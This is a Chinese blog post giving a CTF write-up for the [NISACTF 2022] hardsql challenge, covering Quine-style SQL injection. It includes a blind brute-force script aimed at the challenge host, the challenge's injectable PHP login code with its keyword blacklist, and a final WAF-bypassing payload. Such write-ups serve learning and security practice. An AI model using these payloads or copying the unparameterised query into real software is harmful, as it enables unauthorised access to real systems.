SQL注入之Quine注入

最新推荐文章于 2024-07-27 12:20:46 发布
最新推荐文章于 2024-07-27 12:20:46 发布
阅读量2.6k 收藏 11
点赞数 8
文章标签: python web安全
Aiwin
本文链接:https://blog.csdn.net/weixin_53090346/article/details/125531088
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

目录

前言

一、Quine是什么?

二、[NISACTF 2022]hardsql

前言

提示:这里可以添加本文要记录的大概内容:

SQL注入的各种手段很多,今天做CTF题的时候,又遇到了一种不常考的但是很细节的注入,记录一下。

提示:以下是本篇文章正文内容,下面案例可供参考

一、Quine是什么?

Quine指的是自产生程序,简单的说,就是输入的sql语句与要输出的一致,下面是例题。

二、[NISACTF 2022]hardsql

 题目提示:

$password=$_POST['passwd'];
$sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";

1,进入题目:

 题目说登录的账号为bilala,只有登录密码是可注入的点,首先要进行登录,进行一些常规注入的小尝试,发现存在waf过滤了空格,and,updatexml,=,database,sleep,information_schema之类的,过滤的挺多。可以利用like+通配符%进行密码的爆破,爆破脚本如下:

import requests

url = 'http://1.14.71.254:28860/login.php'
str = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
flag = ''
for i in range(62):
    for j in str:
        data = {
            'username': 'bilala', "passwd":f"-1'/**/or/**/passwd/**/like/**/'{flag+j}%'#"
        }
        response = requests.post(url, data=data)
        if "nothing found" not  in response.text:
            flag = flag + j
            print(flag)
            break
print(flag)

登录进去后,看到了源码:     

 <?php
//多加了亿点点过滤

include_once("config.php");
function alertMes($mes,$url){
    die("<script>alert('{$mes}');location.href='{$url}';</script>");
}

function checkSql($s) {
    if(preg_match("/if|regexp|between|in|flag|=|>|<|and|\||right|left|insert|database|reverse|update|extractvalue|floor|join|substr|&|;|\\\$|char|\x0a|\x09|column|sleep|\ /i",$s)){
        alertMes('waf here', 'index.php');
    }
}

if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['passwd']) && $_POST['passwd'] != '') {
    $username=$_POST['username'];
    $password=$_POST['passwd'];
    if ($username !== 'bilala') {
        alertMes('only bilala can login', 'index.php');
    }
    checkSql($password);
    $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";
    $user_result=mysqli_query($MysqlLink,$sql);
    $row = mysqli_fetch_array($user_result);
    if (!$row) {
        alertMes('nothing found','index.php');
    }
    if ($row['passwd'] === $password) {
        if($password == 'b2f2d15b3ae082ca29697d8dcd420fd7'){
            show_source(__FILE__);
            die;
        }
        else{
            die($FLAG);
        }
    } else {
        alertMes("wrong password",'index.php');
    }
}

?>

 解题的关键思路在:

  if ($row['passwd'] === $password) { #关键
        if($password == 'b2f2d15b3ae082ca29697d8dcd420fd7'){
            show_source(__FILE__);
            die;
        }
        else{
            die($FLAG);
        }
    } else {
        alertMes("wrong password",'index.php');
    }
}

查询出来的passwd要和$password强相等,且$passwor不等于b2f2d15b3ae082ca29697d8dcd420fd7。

但是事实上这张表其实是个空表,只有构造输入输出完全一致的语句,才能绕过限制得到FLAG,主要利用replace(str,old_string,new_string)进行构造,构造思路如下:

select replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")');

利用'replace(".",char(46),".")');替换'replace(".",char(46),".")'中的符号.

输入和输出的结果为: 

replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")');

replace("replace(".",char(46),".")",char(46),"replace(".",char(46),".")") ;

这样其实还没有达到输入和输出一致的问题,因为还有单引号和双引号不一致,所以要解决单双引号的问题,再套一层replace,将双引号替换成单引号即可,如下:

 replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")');

输出的结果为:

replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")')

 这样就形成了输入和输出的结果一致 。

题中还过滤了char,用chr或者直接0x代替即可。

所以最终的payload为:

username=bilala&passwd='/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#',0x22,0x27),0x25,'"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#')#&login=%E7%99%BB%E5%BD%95

M03-Aiwin
关注
  • 8
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
[NISACTF 2022]hardsql - quine注入
oZuoShen123的博客
10-05 584
题目描述:`$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";` 从描述看出是quine注入,且用户名要是bilala 1、经测试,参数为:username=&passwd=&login=登录,username必须为bilala 2、【= and 空格】被过滤【like or /**/】 3、参考文章:https://blog.csdn.ne
记录一次quine注入的学习
Zh1A0的博客
08-24 877
记录一次sql注入Quine注入的学习
sql注入 Quine注入解析
arcuied
04-24 854
sql注入 Quine注入解析
(超详细)[NISACTF 2022]hardsql——writeup
qq_74426248的博客
07-25 401
本文章为[NISACTF 2022]hardsql——writeup,欢迎各位师傅一起讨论!!!
quine (T-SQL Version, C-style)
Trending Up...
12-23 1047
 /*because the output parameter of master..xp_sprintf can not exceed 255,this script can not display the correct result.but the technique behind the code really works*/declare @1 varchar(255), @2 va
HSCCTF-WEB-PWD(quine注入
m0_74855736的博客
03-12 868
思路:爆破密码,但like被过滤,因为界面显示,无论访问成功与否都是一样的,无法使用布尔盲注,时间盲注的化sleep,if,substr等函数也被禁用,该题使用一种quine注入的技巧。quine是一种计算机程序,它不接受输入并产生自己源代码的副本作为唯一的输出。里面是空表,因此需要我们的输入与最后的结果相等绕过验证,这就需要用到Quine。先将str里的双引号替换成单引号,再用str替换str里的间隔符。的双引号换成单引号,这样最后就不会出现引号不一致的情况了。中的间隔符使用双引号的原因是,
[HDCTF 2023]LoginMaster 复现 (记quine注入
qq_73767109的博客
04-24 875
benchmark时间盲注 [HDCTF 2023]LoginMaster 复现 quine注入解释
qmc.zip_Sharp_quine
09-23
《C#实现Quine-McCluskey算法详解》 Quine-McCluskey算法,简称QMC算法,是一种用于简化布尔表达式的方法,它主要用于逻辑设计中的化简问题,帮助减少逻辑门的数量,提高电路效率。在C#编程语言中实现QMC算法,可以...
QM.zip_qm_quine mccluskey
09-23
Quine-McCluskey(简称QMC)算法是一种用于化简布尔表达式的经典方法,尤其在数字逻辑设计和计算机科学领域中广泛应用。这个算法主要用于找出一个布尔函数的最简与或表达式,即找到最少的基元事件来表示原布尔表达式...
quine-relay:具有100多种编程语言的uroboros程序
02-16
奎因继电器 这是什么 这是一个生成Rust程序的Ruby程序,该生成Rust的程序生成Scala程序,该Scala程序生成...(总共通过128种语言)。REXX程序再次生成原始Ruby代码。 (如果要查看旧的50语言版本,请参阅分支。...
q---m.zip_Quine-McClusky
09-21
Quine-McCluskey(Q-M)算法是一种在数字逻辑设计中用于简化布尔函数的高效方法。这个算法主要用于减少布尔表达式的项数,从而优化逻辑电路,减少硬件资源的使用,提高系统的运行效率。在计算机科学和电子工程领域,...
Quine-McCluskey C++实现
05-08
用C++实现Quine-McCluskey算法,输入模式为最小项的输入(输入最小项),本程序目前最大支持6个变量的化简,自己编写的程序~输出格式也是以最小项的模式,输出中的' -'表示这个变量不用显示,' 1' 代表最小项中有...
SQL Query
HelloWorld
01-07 524
SQL QueryTablesQueries Tables CREATE TABLE YELP_USER ( Yelp_ID VARCHAR(10) PRIMARY KEY, Email VARCHAR(30) NOT NULL, FN VARCHAR(10) NOT NULL, LN VARCHAR(10) NOT NULL, DOB DATE NOT NULL, BirthPlace VARCHAR(30) NOT NULL, Gender CHA
[NISACTF 2022]
snowlyzz的博客
09-09 6103
NISACTF部分WP
NISACTF2022公开通道(复现)
as you know, nlp is fantasitc!
03-31 4748
目录middlerce(复现)join-us(复现)hardsql(复现) middlerce(复现) <?php include "check.php"; if (isset($_REQUEST['letter'])){ $txw4ever = $_REQUEST['letter']; if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw
[NISACTF 2022]WriteUp web
Pysnow's Blog
04-01 4479
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
[NCTF2019]SQLi
Yb_140的博客
11-30 381
sql盲注
php preg_match sql,php中常见的sql攻击正则表达式汇总
weixin_36054993的博客
03-10 351
本文实例讲述了php中常见的sql攻击正则表达式。分享给大家供大家参考。具体分析如下:我们都已经知道,在MYSQL 5+中 information_schema库中存储了所有的 库名,表明以及字段名信息。故攻击方式如下:1. 判断第一个表名的第一个字符是否是a-z中的字符,其中blind_sqli是假设已知的库名。注:正则表达式中 ^[a-z] 表示字符串中开始字符是在 a-z范围内index.p...
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>
最新发布
qq_64603703的博客
07-27 724
详细解说数据分析pandas库中的常用方法
quine-mccluskey method
11-30
Quine-McCluskey方法是一种用于最小化布尔函数的方法。它通过将布尔函数转换为最简化的多项式形式,以便更容易地实现或设计电路。 该方法的基本思想是使用卡诺图(Karnaugh map)的拓展版本来找到所有的重要项。首先,将布尔函数的真值表转化为卡诺图,然后根据卡诺图中的相邻位单元(最大化相邻的1)进行合并。这些合并操作可以产生更小的项,将真值表中不必要的变量进行消除,最终得到最简化的布尔表达式。 在使用Quine-McCluskey方法时,以下步骤是关键的: 1. 将布尔函数的真值表转换为卡诺图,并将1的位填入相应的格子中。 2. 找到卡诺图中所有的重要项-这些项代表着最后的布尔表达式中的主要组成部分。 3. 按照卡诺图的规则合并相邻位单元(最大化1的位数)。这些合并操作将产生更小的项,减少布尔表达式的复杂性。 4. 继续合并、消除和处理其他重要项,直到不能再进行合并操作为止。 5. 最后,根据卡诺图的结果,得到最简化的布尔表达式。 Quine-McCluskey方法是一种有效的方法,可以用于减少布尔函数的大小,并简化相应的电路设计过程。尽管手工计算非常费时且容易出错,但现代计算机系统可以自动化这一过程,使得设计人员能够更快速、准确地处理复杂的布尔函数。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M03-Aiwin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值